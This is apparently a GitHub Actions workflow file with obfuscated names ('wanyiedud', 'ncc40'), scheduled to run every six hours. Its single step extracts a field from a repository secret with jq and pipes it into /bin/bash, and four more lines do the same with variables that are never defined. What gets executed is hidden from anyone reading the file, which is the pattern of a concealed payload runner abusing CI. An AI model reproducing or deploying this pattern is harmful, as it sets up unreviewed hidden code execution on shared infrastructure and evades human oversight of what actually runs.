name: wanyiedud
on:
  workflow_dispatch:
  schedule:
    - cron: '9 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wanyiedud
        env:
          ncc40: ${{ secrets.ncc40 }}
        run: |
          echo $ncc40 | jq -r .m27 | /bin/bash
          echo $ds39362 | jq -r .y5404 | /bin/bash
          echo $co2739 | jq -r .qjx0874 | /bin/bash
          echo $ozjlu2 | jq -r .r18907 | /bin/bash
          echo $zeqwl041 | jq -r .dth30 | /bin/bash

